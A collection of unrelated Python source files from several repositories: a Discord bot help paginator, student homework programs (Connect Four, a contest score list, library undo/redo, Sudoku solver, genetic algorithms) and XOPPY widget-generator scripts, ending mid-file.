discord.MessageInteraction): self.paginator = paginator if self.paginator.n_pages > 1: self.reset_buttons() else: self.disable_buttons() await interaction.message.edit(embed=self.paginator.current(), view=self) @discord.ui.button(label="<<", style=discord.ButtonStyle.secondary, disabled=True) async def first_page(self, button: discord.ui.Button, interaction: discord.MessageInteraction): self.first_page.disabled = True self.prev_page.disabled = True self.next_page.disabled = False self.last_page.disabled = False self.paginator.first() await interaction.response.edit_message(embed=self.paginator.current(), view=self) @discord.ui.button(label='Back', style=discord.ButtonStyle.primary, disabled=True) async def prev_page(self, button: discord.ui.Button, interaction: discord.MessageInteraction): self.next_page.disabled = False self.last_page.disabled = False self.paginator.previous() if self.paginator.is_first(): self.first_page.disabled = True self.prev_page.disabled = True await interaction.response.edit_message(embed=self.paginator.current(), view=self) @discord.ui.button(label='Next', style=discord.ButtonStyle.primary) async def next_page(self, button: discord.ui.Button, interaction: discord.MessageInteraction): self.first_page.disabled = False self.prev_page.disabled = False self.paginator.next() if self.paginator.is_last(): self.next_page.disabled = True self.last_page.disabled = True await interaction.response.edit_message(embed=self.paginator.current(), view=self) @discord.ui.button(label=">>", style=discord.ButtonStyle.secondary) async def last_page(self, button: discord.ui.Button, interaction: discord.MessageInteraction): self.first_page.disabled = False self.prev_page.disabled = False self.next_page.disabled = True self.last_page.disabled = True self.paginator.last() await interaction.response.edit_message(embed=self.paginator.current(), view=self) @discord.ui.button(label="Exit", style=discord.ButtonStyle.red) async def remove(self, button: discord.ui.Button, interaction: discord.MessageInteraction): await interaction.response.edit_message(view=None) self.stop() class KuriHelp(commands.HelpCommand): def __init__(self): super().__init__(show_hidden=True) async def prepare_help_command(self, ctx, command=None): await ctx.bot.wait_until_all_ready() async def send_bot_help(self, mapping: dict[commands.Cog, list[commands.Command]]): f_mapping = {} # Create a mapping with the commands filtered for cog, cmds in mapping.items(): if cog and (f_cmds := await self.filter_commands(cmds, sort=True)): f_mapping[cog] = f_cmds bot = self.context.bot view = HelpView(MainHelpPaginator(f_mapping, bot.description, self.context.prefix), self.context.author) view.add_item(CategorySelect(f_mapping, self.context)) channel = self.get_destination() msg = await channel.send(embed=view.paginator.current(), view=view, reference=self.context.message) view.message = msg async def send_cog_help(self, cog: commands.Cog): commands = await self.filter_commands(cog.get_commands(), sort=True) view = HelpView(CogHelpPaginator(cog, commands, self.context.prefix), self.context.author) # All my homies hate Assistance # If there is >25 commands create multiple Selects and add a suffix indicating what commands are inside [A-C] if len(commands) > SELECT_MAX_VALUES: for i in range(0, len(commands), SELECT_MAX_VALUES - 1): view.add_item(CommandSelect(cog, commands[i:i + SELECT_MAX_VALUES - 1], self.context, suffix=f"[{commands[i].name[0].upper()}-{commands[i:i + SELECT_MAX_VALUES - 2][-1].name[0].upper()}]")) else: view.add_item(CommandSelect(cog, commands, self.context)) channel = self.get_destination() msg = await channel.send(embed=view.paginator.current(), view=view, reference=self.context.message) view.message = msg async def send_group_help(self, group: commands.Group): commands = await self.filter_commands(group.commands, sort=True) view = HelpView(CogHelpPaginator(group, commands, prefix=self.context.clean_prefix), self.context.author) view.add_item(CommandSelect(group.cog, commands, self.context)) channel = self.get_destination() msg = await channel.send(embed=view.paginator.current(), view=view, reference=self.context.message) view.message = msg async def send_command_help(self, command: commands.Command): embed = CommandHelpPaginator(command, self.context.clean_prefix).current() channel = self.get_destination() await channel.send(embed=embed, reference=self.context.message) async def send_error_message(self, error: str): embed = discord.Embed(title="Not Found", description=error, colour=self.context.bot.colour) channel = self.get_destination() await channel.send(embed=embed) ```
{ "source": "916-Maria-Popescu/Fundamental-of-Programming", "score": 4 }
#### File: Fundamental-of-Programming/HW11 - Connect Four Game/ConsoleUI.py ```python import random """ Connect Four is a two-player connection board game, in which the players choose a color and then take turns dropping colored discs into a seven-column, six-row vertically suspended grid. The pieces fall straight down, occupying the lowest available space within the column. The objective of the game is to be the first to form a horizontal, vertical, or diagonal line of four of one's own discs. """ class Console: def __init__(self, service): self.__service = service def run_console(self): # ---------------------------------------------------------Options print("Welcome to the game") option = input("How do you want to play?\n" " 1 -> player vs player\n" " 2 -> Player vs computer\n" " my option:") name1 = input("Player 1, please enter your name: ") if option == '1': # Player versus player game: name2 = input("Player 2, please enter your name: ") print(name1, " and ", name2, "you'll play against each other") elif option == '2': # Player versus computer game: print(name1, "you'll play against the Computer") name2 = 'Computer' else: print("sorry! wrong option!") print(self.__service.flip_board()) # ------------------------------------------------------------------SetUp stop_the_game = False turn = 0 # turn 0 for player1 and turn 1 for player2/computer # --------------------------------------------------------------------the game while stop_the_game is False: if turn == 0: # Player 1 move: piece = 1 while True: move = int(input(name1 + ", what column do you choose? : ")) - 1 if self.__service.validate_move(move): self.__service.implement_move(move, piece) print(self.__service.flip_board()) break else: print("That column is already full!") if self.__service.check_win(piece): stop_the_game = True print("Congrats!!!", name1, "you are the winner!") else: piece = 2 # Player 2 or Computer if option == '1': # Player 2 move: while True: move = int(input(name2 + ", what column do you choose? : ")) - 1 if self.__service.validate_move(move): self.__service.implement_move(move, piece) print(self.__service.flip_board()) break else: print("That column is already full!") if self.__service.check_win(piece): stop_the_game = True print("Congrats!!!", name2, "you are the winner!") else: # Computer move: while True: move = random.randint(0, 6) if self.__service.validate_move(move): self.__service.implement_move(move, piece) print("Computer move: ", move + 1) print(self.__service.flip_board()) break if self.__service.check_win(piece): stop_the_game = True print(name1, "you are the loser!") turn = turn + 1 turn = turn % 2 ``` #### File: Fundamental-of-Programming/HW3 - Contest Data Base/main.py ```python def get(list, position): """ The function will extract a certain element from a list.""" return list[int(position)] def set(list, element, position): """ The functin will set a certain element from a list. :param list: [ ['2', '4', '8'], ['3', '5', '6'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'] ] :param element: ['5', '8', '9'] :param position: 1 :return: [ ['2', '4', '8'], ['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'] """ list.insert(int(position), element) list.remove(get(list, int(position) + 1)) def make_a_list(sentence): """ The function will make a list containing the given scores P1, P2 and P3 that are found in the command.""" list_one_score = [] for i in range(1, 4): list_one_score.append(sentence[i]) return list_one_score def add_scores(list, sentence): """ The function will add to the principal list (with all the scores of all the participants) a list with the scores of just one participant. """ list.append(make_a_list(sentence)) def insert_scores(list, sentence, position): """ The function will insert in a given position to the principal list (with all the scores of all the participants) a list with the scores of just one participant """ list.insert(int(position), make_a_list(sentence)) def remove_one_part(list, position): """ The function will set the scores of the participant at a given position to 0. So that, the participant <position> score P1=P2=P3= 0. """ nul_element = ['0', '0', '0'] set(list, nul_element, position) def remove_more_part(list, first_position, last_position): """ The function will set the scores of all the participants between the first position and last position to 0. For all the participants between <first_position> and <last_position>, P1=P1=P3= 0 """ nul_element = ['0', '0', '0'] for i in range(int(first_position), int(last_position) + 1): set(list, nul_element, i) def remove(list, cmd): if len(cmd) == 2: # The command is remove <position> remove_one_part(list, get(cmd, 1)) elif len(cmd) == 4: # The command is remove <first pos> to <last pos> remove_more_part(list, get(cmd, 1), get(cmd, 3)) def replace(list, problem, new_score): """ The function will replace a score obtained by a participant at a specific problem with a new score. List represents the list with the scores of a participant, where <problem> ( P1/P2/P3 ) will recive a new score """ set(list, new_score, int(problem[1]) - 1) def calc_average(list): """ The function will calculate the average of all the integers from a list ( it will calculate the sum of al the integers, and then it will divide the sum by the value of the len of tne list) :param list: [ '2', '4', '3' ] :return: 3 """ result = 0 for i in range(0, len(list)): result = result + int(get(list, i)) return result / len(list) def average_score_lesser(list, number): """ The function will display all the participants with an average score lesser than the given number. :param list: [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']] :param number: 7 :return:['10', '4', '6'], ['9', '3', '2'] """ l = [] # l is the required list for i in range(0, len(list)): if calc_average(get(list, i)) < number: l.append(get(list, i)) return l def average_score_equal(list, number): """ The function will display all the participants with an average score equal with the given number. :param list: [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']] :param number: 8 :return:['7', '8', '9'] """ l = [] # l is the required list for i in range(0, len(list)): if calc_average(get(list, i)) == number: l.append(get(list, i)) return l def average_score_greater(list, number): """ The function will return a list with all the participants with an average score greater than the given number. :param list: [['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']] :param number: 7 :return: [['10', '10', '10'], ['7', '8', '9']] """ l = [] # l is the required list for i in range(0, len(list)): if calc_average(get(list, i)) > number: l.append(get(list, i)) return l def list_sorted(list): """ The function will return a list with participants sorted in decreasing order of average score :param list: [['5', '8', '9'], ['10', '4', '6'], ['10', '10', '10'], ['7', '8', '9'], ['10', '2', '9']] :return: [['10', '10', '10'], , ['7', '8', '9'], ['5', '8', '9'], ['10', '2', '9'], ['10', '4', '6']] """ l = [] for i in range(0, len(list)): get(list, i).insert(0, calc_average(get(list, i))) l.append(get(list, i)) l.sort(reverse=True) for i in range(0, len(l)): get(l, i) get(l, i).remove(get(get(l, i), 0)) return l def list(list, cmd): if len(cmd) == 1: l = list elif get(cmd, 1) == 'sorted': l = list_sorted(list) elif get(cmd, 1) == '<': l = average_score_lesser(list, int(get(cmd, 2))) elif get(cmd, 1) == '=': l = average_score_equal(list, int(get(cmd, 2))) elif get(cmd, 1) == '>': l = average_score_greater(list, int(get(cmd, 2))) print(l) def print_menu(): commands = ['add <P1 score> <P2 score> <P3 score>', 'insert <P1 score> <P2 score> <P3 score> at <position>', 'remove <position>', 'remove <start position> to <end position>', 'replace <position> <P1 | P2 | P3> with <new score>', 'list', 'list sorted', 'list [< | = | >] <score>'] print("The possible comands are:") print(*commands, sep="\n") def run_menu(): list_participants_scores = [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9'], ['8', '9', '10'], ['10', '2', '9'], ['2', '4', '6'], ['8', '2', '1'], ['0', '8', '4']] commands = ['add <P1 score> <P2 score> <P3 score>', 'insert <P1 score> <P2 score> <P3 score> at <position>', 'remove <position>', 'remove <start position> to <end position>', 'replace <position> <P1 | P2 | P3> with <new score>', 'list', 'list sorted', 'list [< | = | >] <score>'] while True: comand = input() comand_splited = comand.split() first_word = get(comand_splited, 0) if first_word == 'add': # The command is add P1, P2, P3 add_scores(list_participants_scores, comand_splited) elif first_word == 'insert': # The command is insert [P1, P2, P3] at position insert_scores(list_participants_scores, comand_splited, comand_splited[5]) elif first_word == 'remove': remove(list_participants_scores, comand_splited) elif first_word == 'replace': # The command is replace <old score> P1/P2/P3 with <new score> replace(get(list_participants_scores, int(get(comand_splited, 1))), get(comand_splited, 2), (get(comand_splited, 4))) elif first_word == 'list': (list(list_participants_scores, comand_splited)) else: print("Wrong command") break if __name__ == '__main__': print_menu() run_menu() ``` #### File: HW6789 - Library Data Base/Service/UndoRedoHandler.py ```python from enum import Enum from Service.ServiceUndoRedo import RedoService, UndoService # -----------------------------------------------------------------------------------------BOOK def undo_add_book(service_book, id_book): title = service_book.find_by_id(id_book).get_title() # for redo author = service_book.find_by_id(id_book).get_author() # for redo service_book.remove_book(id_book) RedoService.store_operation(service_book, RedoHandler.ADD_BOOK, id_book, title, author) def undo_remove_book(service_book, id_book, title, author): service_book.add_book(id_book, title, author) RedoService.store_operation(service_book, RedoHandler.REMOVE_BOOK, id_book) def undo_update_book(service_book, id_book, old_title, old_author): new_title = service_book.find_by_id(id_book).get_title # for redo new_author = service_book.find_by_id(id_book).get_author # for redo service_book.find_by_id(id_book).set_title(old_title) service_book.find_by_id(id_book).set_author(old_author) RedoService.store_operation(service_book, RedoHandler.UPDATE_BOOK, id_book, new_title, new_author) # ------------------------------------------------------------------------------------------CLIENT def undo_add_client(service_client, id_client): name = service_client.find_by_id(id_client).get_name() service_client.remove_client(id_client) RedoService.store_operation(service_client, RedoHandler.ADD_CLIENT, id_client, name) def undo_remove_client(service_client, id_client, name): service_client.add_client(id_client, name) RedoService.store_operation(service_client, RedoHandler.REMOVE_CLIENT, id_client) def undo_update_client(service_client, id_client, old_name): new_name = service_client.find_by_id(id_client).get_name() # for redo service_client.find_by_id(id_client).set_name(old_name) RedoService.store_operation(service_client, RedoHandler.UPDATE_CLIENT, id_client, new_name) # ---------------------------------------------------------------------------------------RENTAL def undo_rent_book(service_rental, id_rental): id_book = service_rental.find_by_id(id_rental).get_id_book() # for redo id_client = service_rental.find_by_id(id_rental).get_id_client() # fore redo rented_date = service_rental.find_by_id(id_rental).get_rented_date() # for redo service_rental.remove_rental(id_rental) RedoService.store_operation(service_rental, RedoHandler.RENT_BOOK, id_rental, id_book, id_client, rented_date) def undo_return_book(service_rental, id_rental): returned_date = service_rental.find_by_id(id_rental).get_returned_date() service_rental.find_by_id(id_rental).set_returned_date('-') RedoService.store_operation(service_rental, RedoHandler.RETURN_BOOK, id_rental, returned_date) # ---------UNDO HANDLER CLASS class UndoHandler(Enum): ADD_BOOK = undo_add_book REMOVE_BOOK = undo_remove_book UPDATE_BOOK = undo_update_book ADD_CLIENT = undo_add_client REMOVE_CLIENT = undo_remove_client UPDATE_CLIENT = undo_update_client RENT_BOOK = undo_rent_book RETURN_BOOK = undo_return_book # -----------------------------------------------------------------------------------BOOK def redo_add_book(service_book, id_book, title, author): service_book.add_book(id_book, title, author) UndoService.store_operation(service_book, UndoHandler.ADD_BOOK, id_book) def redo_remove_book(service_book, id_book): title = service_book.find_by_id(id_book).get_title() author = service_book.find_by_id(id_book).get_author() service_book.remove_book(id_book) UndoService.store_operation(service_book, UndoHandler.REMOVE_BOOK, id_book, title, author) def redo_update_book(service_book, id_book, title, author): old_title = service_book.find_by_id(id_book).get_title() old_author = service_book.find_by_id(id_book).get_author() service_book.find_by_id(id_book).set_title(title) service_book.find_by_id(id_book).set_author(author) UndoService.store_operation(service_book, UndoHandler.UPDATE_BOOK, id_book, old_title, old_author) # --------------------------------------------------------------------------------------CLIENT def redo_add_client(service_client, id_client, name): service_client.add_client(id_client, name) UndoService.store_operation(service_client, UndoHandler.ADD_CLIENT, id_client) def redo_remove_client(service_client, id_client): name = service_client.find_by_id(id_client).get_name() service_client.remove_client(id_client) UndoService.store_operation(service_client, UndoHandler.REMOVE_CLIENT, id_client, name) def redo_update_client(service_client, id_client, name): old_name = service_client.find_by_id(id_client).get_name() service_client.find_by_id(id_client).set_name(name) UndoService.store_operation(service_client, UndoHandler.UPDATE_CLIENT, id_client, old_name) # ---------------------------------------------------------------------------------------RENTAL def redo_rent_book(service_rental, id_rental, id_book, id_client, rented_date): service_rental.add_rental(id_rental, id_book, id_client, rented_date, '-') UndoService.store_operation(service_rental, UndoHandler.RENT_BOOK, id_rental) def redo_return_book(service_rental, id_rental, returned_date): service_rental.find_by_id(id_rental).set_returned_date(returned_date) UndoService.store_operation(service_rental, UndoHandler.RETURN_BOOK, id_rental) # -----------------------------------------------------------------------------------CLIENT class RedoHandler(Enum): ADD_BOOK = redo_add_book REMOVE_BOOK = redo_remove_book UPDATE_BOOK = redo_update_book ADD_CLIENT = redo_add_client REMOVE_CLIENT = redo_remove_client UPDATE_CLIENT = redo_update_client RENT_BOOK = redo_rent_book RETURN_BOOK = redo_return_book ```
{ "source": "9173860/WMSeg", "score": 3 }
#### File: WMSeg/pytorch_pretrained_zen/ngram_utils.py ```python import os import logging NGRAM_DICT_NAME = 'ngram.txt' logger = logging.getLogger(__name__) class ZenNgramDict(object): """ Dict class to store the ngram """ def __init__(self, ngram_freq_path, tokenizer, max_ngram_in_seq=128): """Constructs ZenNgramDict :param ngram_freq_path: ngrams with frequency """ if os.path.isdir(ngram_freq_path): ngram_freq_path = os.path.join(ngram_freq_path, NGRAM_DICT_NAME) self.ngram_freq_path = ngram_freq_path self.max_ngram_in_seq = max_ngram_in_seq self.id_to_ngram_list = ["[pad]"] self.ngram_to_id_dict = {"[pad]": 0} self.ngram_to_freq_dict = {} logger.info("loading ngram frequency file {}".format(ngram_freq_path)) with open(ngram_freq_path, "r", encoding="utf-8") as fin: for i, line in enumerate(fin): ngram,freq = line.split(",") tokens = tuple(tokenizer.tokenize(ngram)) self.ngram_to_freq_dict[ngram] = freq self.id_to_ngram_list.append(tokens) self.ngram_to_id_dict[tokens] = i + 1 def save(self, ngram_freq_path): with open(ngram_freq_path, "w", encoding="utf-8") as fout: for ngram,freq in self.ngram_to_freq_dict.items(): fout.write("{},{}\n".format(ngram, freq)) ```
{ "source": "91884227/37Sudoku-Solver", "score": 3 }
#### File: 37Sudoku-Solver/MYsudoku/sudoku.py ```python import numpy as np import pandas as pd from IPython.display import display, HTML import matplotlib.pyplot as plt # In[3]: class Solution(): def __init__(self, question_): self.question = question_ self.board = question_ self.find_blank_position() # some control signal need in sol self.blank_position_index = 0 self.stop_signal = False # record answer self.answer = [] def find_blank_position(self): blank_position = [] for row in range(9): for col in range(9): if( self.question[row][col] == "" ): blank_position = blank_position + [(row, col)] self.blank_position = blank_position def draw(self): col = row = 9 matrix = np.array(self.board) df = pd.DataFrame(matrix) plt.figure(1, figsize=(5, 5)) tb = plt.table(cellText=matrix, loc=(0,0), cellLoc='center') tc = tb.properties()['child_artists'] for cell in tc: cell.set_height(1.0/row) cell.set_width(1.0/col) ax = plt.gca() ax.set_xticks([]) ax.set_yticks([]) plt.show() def find_candidate(self, row, col): row_element = self.board[row] col_element = [row[col] for row in self.board] buf = np.array(self.board)[row//3*3 : row//3*3+3 , col//3*3 : col//3*3+3] block_element = buf.flatten().tolist() buf_1 = ["1", "2", "3", "4", "5", "6", "7", "8", "9", ""] buf_2 = set(row_element + col_element + block_element) possible_element = list(set(buf_1) - set(buf_2)) possible_element.sort() return(possible_element) def sol(self, draw_ = False): if( self.blank_position_index == len(self.blank_position)): self.stop_signal = True ##!! list 不能直接 copy self.answer = np.array(self.board) else: row, col = self.blank_position[self.blank_position_index] self.blank_position_index = self.blank_position_index + 1 for fill_in in self.find_candidate(row, col): self.board[row][col] = fill_in if( draw_ ): self.draw() self.sol(draw_) if( self.stop_signal): break self.board[row][col] = "" self.blank_position_index = self.blank_position_index - 1 ```
{ "source": "91884227/OneMax-problem", "score": 2 }
#### File: OneMax-problem/myGA/GA.py ```python import numpy as np import matplotlib.pyplot as plt from tqdm import tnrange, tqdm_notebook # In[2]: class Roulette_GA(): def __init__(self, generations_ = 200): # initial parent: buf = np.random.randint(2, size = 60*500) self.parent_list = np.resize(buf, (500,60)) self.chance_prop = [] self.generations = generations_ self.simulation_result = [] def crossover(self, parent_1_, parent_2_): parent_len = len(parent_1_) ranfom_position = np.random.choice(parent_len, 1)[0] if( ranfom_position > parent_len/2 ): children_1 = np.hstack((parent_1_[:ranfom_position], parent_2_[ranfom_position:])) children_2 = np.hstack((parent_2_[:ranfom_position], parent_1_[ranfom_position:])) else : children_1 = np.hstack((parent_2_[:ranfom_position], parent_1_[ranfom_position:])) children_2 = np.hstack((parent_1_[:ranfom_position], parent_2_[ranfom_position:])) return( (children_1, children_2)) def Fitness(self, parent_): return( sum(parent_) ) def Roulette(self): buf = list(map(self.Fitness, self.parent_list)) self.chance_prop = np.asarray(buf)/sum(buf) def Recombination_2(self, _): buf = np.arange( len(self.parent_list) ) select_index = np.random.choice( buf, 2, p = self.chance_prop, replace = False) parent_1 = self.parent_list[ select_index[0] ] parent_2 = self.parent_list[ select_index[1] ] return( self.crossover( parent_1, parent_2) ) def Recombination_all(self): parent_list_len = len(self.parent_list) one_parent_len = len(self.parent_list[0]) buf = list(map(self.Recombination_2, np.arange( parent_list_len/2 ))) self.parent_list = np.reshape(np.asarray(buf), ( parent_list_len, one_parent_len)) def oneRound(self): self.Roulette() self.Recombination_all() max_fitness = max(list(map(self.Fitness, self.parent_list))) # print("max score: %d" % max(list(map(self.Fitness, self.parent_list)))) return( max_fitness ) def draw_plot(self): buf = np.array(self.simulation_result) buf = np.mean(buf, axis=0) print("average of the best fitness values: %.2f" % buf[-1]) plt.plot(buf) plt.ylabel('Fitness') plt.show() def simulation_one(self, generations = 200): buf = [] for i in range(generations) : buf = buf + [self.oneRound()] self.simulation_result.append( buf ) def __call__(self, simulation_times): for i in tqdm_notebook( range(simulation_times) ): self.simulation_one(self.generations) self.draw_plot() # In[5]: class Tournament_GA(Roulette_GA): def Recombination_2(self, _): buf = np.arange( len(self.parent_list) ) select_index_list_1 = np.random.choice( buf, 2, replace = False) select_index_1 = max(select_index_list_1, key = lambda k: self.Fitness(self.parent_list[ k])) select_index_list_2 = np.random.choice( buf, 2, replace = False) select_index_2 = max(select_index_list_2, key = lambda k: self.Fitness(self.parent_list[ k])) select_index = [select_index_1, select_index_2] parent_1 = self.parent_list[ select_index[0] ] parent_2 = self.parent_list[ select_index[1] ] return( self.crossover( parent_1, parent_2) ) # In[6]: class Q4(Roulette_GA): def Fitness(self, parent_): return( sum(parent_) + 800 ) # In[7]: class Q7(Tournament_GA): def Fitness(self, parent_): return( sum(parent_) + 800 ) ```
{ "source": "91902078/XOPPY", "score": 3 }
#### File: devel/glossary/create_widget_glossary.py ```python import sys import os import re #def read_json(json_name): # json_text = open(json_name).read() # json_dict = eval(json_text) # json = sorted(json_dict.items(), # key=lambda x: json_text.index('"{}"'.format(x[0]))) # #print(json) # #json_lowercase = dict((k.lower(), v) for k, v in json.iteritems()) # json_lowercase = json # return json_lowercase re_dict_entry = re.compile(r'"(?P<name>.*?)"\s*:') def read_json(json_name): json_text = open(json_name).read() key_order = [mo.group('name') for mo in re_dict_entry.finditer(json_text)] json_dict = eval(json_text) json = sorted(json_dict.items(), key=lambda x: key_order.index(x[0])) #print(json) #json_lowercase = dict((k.lower(), v) for k, v in json.iteritems()) json_lowercase = json return json_lowercase if __name__ == "__main__": a = read_json("IC_Lens.json") for i,j in a: print("--- %s %s "%(i,j)) b = read_json("BC_PerfectCrystal.json") for i,j in b: print("--- %s %s "%(i,j)) #def create_flags(json): # flags = '["True", "True", "True", "self.RB_CHOICE == 0", "self.RB_CHOICE == 1"]' # return flags # #def create_labels(json): # labels = '["Electron energy [GeV]","Electron current [A]","B from","Magnetic radius [m]","Magnetic field [T]"]' # return labels def create_settings(json): settings = "" for name, value in json: if name[:2] != "__": if isinstance(value, str): settings += ' {} = Setting("{}")\n'.format(name, value) elif isinstance(value, list): settings += ' {} = Setting({})\n'.format(name, value[0]) else: settings += ' {} = Setting({})\n'.format(name, value) return settings def create_calc_args_default(json): settings = "" i = -1 for name, value in json: i += 1 if isinstance(value, str): settings += '{}="{}"'.format(name, value).rstrip('\n') elif isinstance(value, list): settings += '{}={}'.format(name, value[0]).rstrip('\n') else: settings += '{}={}\n'.format(name, value).rstrip('\n') if i < (len(json)-1): settings += ',' return settings def create_calc_args(json): calc_args = "" i = -1 for name, value in json: i += 1 calc_args += '{}=self.{}'.format(name, name) if i < (len(json)-1): calc_args += ',' return calc_args def create_controls(json): controls = "" controls += ' box0 = gui.widgetBox(self.controlArea, " ",orientation="horizontal") \n' controls += ' #widget buttons: compute, set defaults, help\n' controls += ' gui.button(box0, self, "Compute", callback=self.compute)\n' controls += ' gui.button(box0, self, "Defaults", callback=self.defaults)\n' controls += ' gui.button(box0, self, "Help", callback=self.help1)\n' controls += ' self.process_showers()\n' controls += ' box = gui.widgetBox(self.controlArea, " ",orientation="vertical") \n' idx = -1 #controls += ' box = gui.widgetBox(self.controlArea, "Set parameters") \n' #controls += ' box = gui.widgetBox(self.controlArea, " ") \n' controls += ' \n' controls += ' \n' controls += ' idx = -1 \n' for name, value in json: if name[:2] != "__": idx += 1 controls += ' \n' controls += ' #widget index '+str(idx)+' \n' controls += ' idx += 1 \n' controls += ' box1 = gui.widgetBox(box) \n' if isinstance(value, list): controls += list_template.format(name=name,values=str(value[1:])) else: controls += line_edit_templates[type(value)].format(name=name) controls += ' self.show_at(self.unitFlags()[idx], box1) \n' return controls def main(): json_name = sys.argv[1] base = os.path.splitext(json_name)[0] py_name = base + ".py" calc_name = "bl_glossary_template.py" if os.path.exists(py_name): print("file overwritten: "+py_name+"\n") else: print("file written: "+py_name+"\n") if os.path.exists(calc_name): print("appended to file: "+calc_name+"\n") json = read_json(json_name) widget_name = base widget_class_name = widget_id_name = base.replace(" ", "") settings = create_settings(json) controls = create_controls(json) calc_args = create_calc_args(json) calc_args_default = create_calc_args_default(json) dir(json) labels = None flags = None name = None kk = 0 for i,j in json: if i == "__labels": labels = j print("> %d labels found. \n "%(len(labels))) elif i == "__flags": flags = j print("> %d flags found. \n "%(len(flags))) elif i == "__name": name = j print("> found name %s: \n "%(name)) else: if i[:2] != "__": kk += 1 print("> found entry number %d: %s \n "%(kk,i)) print("> found entries (without __) %d: \n "%(kk)) open(py_name, "wt").write(widget_template.format_map(vars())) #open(calc_name, "a").write(calc_template.format_map(vars())) control_template = """ gui.{}(box1, self, "{{name}}", label=self.unitLabels()[idx], addSpace=True""" str_template = control_template.format("lineEdit") + ")\n" int_template = control_template.format("lineEdit") + """, valueType=int, validator=QIntValidator()) """ float_template = control_template.format("lineEdit") + """, valueType=float, validator=QDoubleValidator()) """ line_edit_templates = {str: str_template, int: int_template, float: float_template} list_template = control_template.format("comboBox") + """, items={values}, valueType=list, orientation="horizontal") """ widget_template = """import sys from PyQt4.QtGui import QIntValidator, QDoubleValidator, QApplication, QSizePolicy import numpy as np from orangewidget import gui from orangewidget.settings import Setting from oasys.widgets import widget #try: # from ..tools.xoppy_calc import xoppy_doc #except ImportError: # print("Error importing: xoppy_doc") # raise #try: # from ..tools.xoppy_calc import xoppy_calc_{widget_class_name} #except ImportError: # print("compute pressed.") # print("Error importing: xoppy_calc_{widget_class_name}") # raise class OW{widget_class_name}(widget.OWWidget): name = "{widget_name}" id = "orange.widgets.data{widget_id_name}" description = "xoppy application to compute..." icon = "icons/xoppy_{widget_class_name}.png" author = "create_widget.py" maintainer_email = "<EMAIL>" priority = 10 category = "" keywords = ["xoppy", "{widget_class_name}"] outputs = [{{"name": "xoppy_data", "type": np.ndarray, "doc": ""}}, {{"name": "xoppy_specfile", "type": str, "doc": ""}}] #inputs = [{{"name": "Name", # "type": type, # "handler": None, # "doc": ""}}] want_main_area = False {settings} def __init__(self): super().__init__() {controls} self.process_showers() gui.rubber(self.controlArea) def unitLabels(self): return {labels} def unitFlags(self): return {flags} def compute(self): print("compute executed.") #table = Table.from_numpy(domain, out) #self.send("xoppy_table",table) def defaults(self): self.resetSettings() self.compute() return def help1(self): print("help pressed.") #xoppy_doc('{widget_class_name}') if __name__ == "__main__": app = QApplication(sys.argv) w = OW{widget_class_name}() w.show() app.exec() w.saveSettings() """ calc_template = """ def xoppy_calc_{widget_class_name}({calc_args_default}): print("Inside xoppy_calc_{widget_class_name}. ") return(None) """ main() ``` #### File: devel/glossary/IC_PhotonBeamPencil.py ```python import sys from PyQt4.QtGui import QIntValidator, QDoubleValidator, QApplication, QSizePolicy from Orange.widgets import widget, gui from Orange.widgets.settings import Setting from Orange.data import Table, Domain, ContinuousVariable import numpy as np #try: # from ..tools.xoppy_calc import xoppy_doc #except ImportError: # print("Error importing: xoppy_doc") # raise #try: # from ..tools.xoppy_calc import xoppy_calc_IC_PhotonBeamPencil #except ImportError: # print("compute pressed.") # print("Error importing: xoppy_calc_IC_PhotonBeamPencil") # raise class OWIC_PhotonBeamPencil(widget.OWWidget): name = "IC_PhotonBeamPencil" id = "orange.widgets.dataIC_PhotonBeamPencil" description = "xoppy application to compute..." icon = "icons/xoppy_IC_PhotonBeamPencil.png" author = "create_widget.py" maintainer_email = "<EMAIL>" priority = 10 category = "" keywords = ["xoppy", "IC_PhotonBeamPencil"] outputs = [#{"name": "xoppy_data", # "type": np.ndarray, # "doc": ""}, {"name": "xoppy_table", "type": Table, "doc": ""}, {"name": "xoppy_specfile", "type": str, "doc": ""}] #inputs = [{"name": "Name", # "type": type, # "handler": None, # "doc": ""}] want_main_area = False energyMin = Setting(1000.0) energyMax = Setting(100000.0) def __init__(self): super().__init__() box0 = gui.widgetBox(self.controlArea, " ",orientation="horizontal") #widget buttons: compute, set defaults, help gui.button(box0, self, "Compute", callback=self.compute) gui.button(box0, self, "Defaults", callback=self.defaults) gui.button(box0, self, "Help", callback=self.help1) self.process_showers() box = gui.widgetBox(self.controlArea, " ",orientation="vertical") idx = -1 #widget index 0 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "energyMin", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) #widget index 1 idx += 1 box1 = gui.widgetBox(box) gui.lineEdit(box1, self, "energyMax", label=self.unitLabels()[idx], addSpace=True, valueType=float, validator=QDoubleValidator()) self.show_at(self.unitFlags()[idx], box1) self.process_showers() gui.rubber(self.controlArea) def unitLabels(self): return ['Minimum photon energy [eV]', 'Minimum photon energy [eV]'] def unitFlags(self): return ['True', 'True'] def compute(self): print("compute executed.") #table = Table.from_numpy(domain, out) #self.send("xoppy_table",table) def defaults(self): self.resetSettings() self.compute() return def help1(self): print("help pressed.") #xoppy_doc('IC_PhotonBeamPencil') if __name__ == "__main__": app = QApplication(sys.argv) w = OWIC_PhotonBeamPencil() w.show() app.exec() w.saveSettings() ``` #### File: devel/json/xus.py ```python import sys import numpy as np from PyQt4.QtGui import QIntValidator, QDoubleValidator, QApplication, QSizePolicy from PyMca5.PyMcaIO import specfilewrapper as specfile from orangewidget import gui from orangewidget.settings import Setting from oasys.widgets import widget try: from orangecontrib.xoppy.util.xoppy_calc import xoppy_doc except ImportError: print("Error importing: xoppy_doc") raise try: from orangecontrib.xoppy.util.xoppy_calc import xoppy_calc_xus except ImportError: print("compute pressed.") print("Error importing: xoppy_calc_xus") raise class OWxus(widget.OWWidget): name = "xus" id = "orange.widgets.dataxus" description = "xoppy application to compute..." icon = "icons/xoppy_xus.png" author = "create_widget.py" maintainer_email = "<EMAIL>" priority = 10 category = "" keywords = ["xoppy", 